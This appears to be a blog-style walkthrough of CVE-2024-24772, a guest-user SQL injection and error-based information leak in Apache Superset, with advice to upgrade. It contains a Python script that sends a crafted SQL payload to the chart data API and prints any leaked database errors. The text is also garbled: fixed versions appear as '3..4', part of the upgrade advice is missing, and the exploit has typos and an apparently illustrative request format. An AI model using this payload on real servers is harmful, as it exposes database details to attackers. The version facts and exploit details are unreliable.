CVE-2024-24772 - Guest User SQL Injection & Info Leak in Apache Superset (Full Walkthrough & Exploit)

CVE-2024-24772 is a security vulnerability impacting Apache Superset, a popular data visualization platform used by organizations worldwide. This post will break down the issue in simple terms, show how an attacker could use it, and explain how you can protect your systems.

Quick Summary

- Product affected: Apache Superset

Fixed versions: 3..4 and 3.1.1

- Public ID: CVE-2024-24772
- Risk: HIGH – SQL Injection leading to information leak, exploitable by guests (unauthenticated users)

What Is the Issue?

A guest (not logged-in, or user with minimal privileges) can interact with one of Superset's chart data REST APIs in a tricky way. By sending specially crafted requests, the attacker can:

Cause errors on purpose, which return messages leaking sensitive data from the database.

This means an attacker could learn about the database structure, get system messages, and possibly see chunks of sensitive information—making it easier for later, more dangerous attacks.

How Does the Attack Work?

Superset has REST endpoints that allow users to fetch chart data. These endpoints are supposed to be safe, but in affected versions, they don't properly 'sanitize' SQL statements sent by users in their requests.

A guest can POST directly to endpoints like /api/v1/chart/data and slip in tricky SQL code in the JSON body. If the supplied SQL causes a database error, the error message Superset returns may include data from the database or the exact error, which leaks information.

Let's look at a simplified code snippet for a malicious API call

import requests

SUPSERSET_URL = "https://you.rsuperset.com/api/v1/chart/data";
# No login required! Guest attack

# Craft a payload that will cause an error and maybe leak data
payload = {
    "query_context": {
        "datasource": {"id": 1, "type": "table"},
        "queries": [{
            "raw_sql": "SELECT 1 FROM (SELECT 'leak'||(SELECT CURRENT_USER))a"  # Force error or concatenation
        }]
    }
}

headers = {"Content-Type": "application/json"}
r = requests.post(SUPSERSET_URL, json=payload, headers=headers)

# If you get error messages, inspect the details:
print(r.text)  # Sensitive info may appear here!

Result:
The response might contain detailed error messages straight from the database, possibly leaking the current DB user, schema names, or even parts of data.

Why Is This Serious?

- Anyone can try it. If your Superset instance is even partly public (or exposed internally), a non-logged-in user can exploit it.
- Attackers gain knowledge: Knowing DB users, tables, and schema is like having the blueprint to your house—much easier to plan follow-up attacks.
- Potential lateral movement: More creative attackers could chain this with other vulnerabilities or misconfigurations and further escalate.

If running the 3.1 series: Upgrade to 3.1.1

Download the latest releases here.

The fix ensures guest users cannot inject arbitrary SQL or see detailed database errors anymore.

Further Reading & References

- Official Apache Superset Advisory
- NVD entry for CVE-2024-24772
- Superset Release Notes
- Superset Security Documentation

✔️ Yes: UPGRADE ASAP

❌ No: If you're on 3..4/3.1.1 or higher, you're safe from this issue.

Conclusion

CVE-2024-24772 shows that even trusted, widely-used analytics tools like Apache Superset can have critical vulnerabilities—sometimes exploitable by unauthenticated users. If you're running a vulnerable version, patch right now. Review public access to your Superset dashboards, and limit guest user capabilities as much as possible.

Stay safe, and keep your data visualization secure!

*If you found this post helpful, share it with your sysadmin or security team!*

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC